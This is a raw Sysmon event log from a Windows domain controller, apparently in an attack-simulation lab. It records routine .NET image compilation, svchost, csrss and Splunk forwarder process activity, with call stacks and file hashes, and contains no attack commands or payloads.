21:06:51.452{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A26B-60D3-1205-00000000CF01}3332C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000022422Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.405{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A26B-60D3-1205-00000000CF01}3332C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022421Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.405{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A26B-60D3-1205-00000000CF01}3332C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Micro
soft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022420Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.405{4DB9351A-A26B-60D3-1105-00000000CF01}6848NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\ISHGW9W7FM\System.Runtime.Remoting.ni.dll.auxMD5=8E34B2EEE11D21650BC0D7343572310B,SHA256=90F40FDF9C0E89EB7FF891CB60EE0B068E94D324DC2A6FDA6324BEBA0184AA06,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022419Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.405{4DB9351A-A26B-60D3-1105-00000000CF01}6848NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\ISHGW9W7FM\System.Runtime.Remoting.ni.dllMD5=665A3841AA03F9AF9E8F96D346E65565,SHA256=85879FD01DC356F9B0C4BE799673C6C6290689CA11FA9FB0248814FC9AFDA9CF,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022418Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.362{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A26B-60D3-1105-00000000CF01}6848C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000022417Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.327{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A26B-60D3-1105-00000000CF01}6848C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022416Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.327{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A26B-60D3-1105-00000000CF01}6848C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Micro
soft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022415Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.327{4DB9351A-A26A-60D3-1005-00000000CF01}3752NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\QJ40NM0T23\System.Windows.Forms.ni.dll.auxMD5=461203907E8693D5B93D7BFA570B19B7,SHA256=651F7F4AB3EAFCAF9C7757EFD99F3B962310FF3E8F0A5D98EF36409F2F62DBB2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022414Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.327{4DB9351A-A26A-60D3-1005-00000000CF01}3752NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\QJ40NM0T23\System.Windows.Forms.ni.dllMD5=668E7D31E685A220F6D84F17AF62F851,SHA256=CFB4DD013E776D4A5868B72EDAAA25A537FC26564062A2E382C72287534FC289,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000022413Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.233{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC5DFBD2C41086F98B0FAA7026AC6206,SHA256=58AA3F631FDC24C65E75B3836067727D19922147A8690632F2F1601D0234C6E6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022504Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.983{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A26C-60D3-2105-00000000CF01}5784C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022503Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.983{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022502Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:52.983{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022501Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.983{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022500Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:52.983{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022499Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.983{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A26C-60D3-2105-00000000CF01}5784C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022498Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.983{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A26C-60D3-2105-00000000CF01}5784C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000022497Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.984{4DB9351A-A26C-60D3-2105-00000000CF01}5784C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000022496Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.983{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A26C-60D3-2005-00000000CF01}4352C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 
10341000x800000000000000022495Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.983{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A26C-60D3-2005-00000000CF01}4352C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022494Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.968{4DB9351A-A26C-60D3-1F05-00000000CF01}4720NT 
AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\ZG8S7PJPUN\System.Runtime.WindowsRuntime.UI.Xaml.ni.dll.auxMD5=8587B16400669B0ED0FEF2A164426A58,SHA256=D00A7F367941415A86EF6347CDD4F148D9F3D5547C165F348B128AEA4036D97C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022493Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.968{4DB9351A-A26C-60D3-1F05-00000000CF01}4720NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\ZG8S7PJPUN\System.Runtime.WindowsRuntime.UI.Xaml.ni.dllMD5=7B885BDEE599A19BB7F5F0C7FE7CA7C1,SHA256=92006247CB0F0C7D8B289F241FDADA2C07FF5B3A65A0AAA261D467ACCDF63A21,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022492Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.936{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A26C-60D3-1F05-00000000CF01}4720C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022491Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:52.905{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A26C-60D3-1F05-00000000CF01}4720C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022490Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.905{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A26C-60D3-1F05-00000000CF01}4720C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 
23542300x800000000000000022489Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.905{4DB9351A-A26C-60D3-1E05-00000000CF01}6320NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\K840NGD2KB\System.Runtime.WindowsRuntime.ni.dll.auxMD5=7E1BA6F004327D87B33CDC84A1E174E2,SHA256=A7D5238F6EF69A01F3068C5DAEE5D19E3A10229AEE1DE1D1BE7F2CD265251978,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022488Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.905{4DB9351A-A26C-60D3-1E05-00000000CF01}6320NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\K840NGD2KB\System.Runtime.WindowsRuntime.ni.dllMD5=3728FE7D5E46B8174BDF4B0CB3F32D4C,SHA256=6E0AAF51B717224BFF1D1BFE4D2AC9F18E8037FE14C13D68592A3461540ACE53,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022487Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.796{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A26C-60D3-1E05-00000000CF01}6320C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
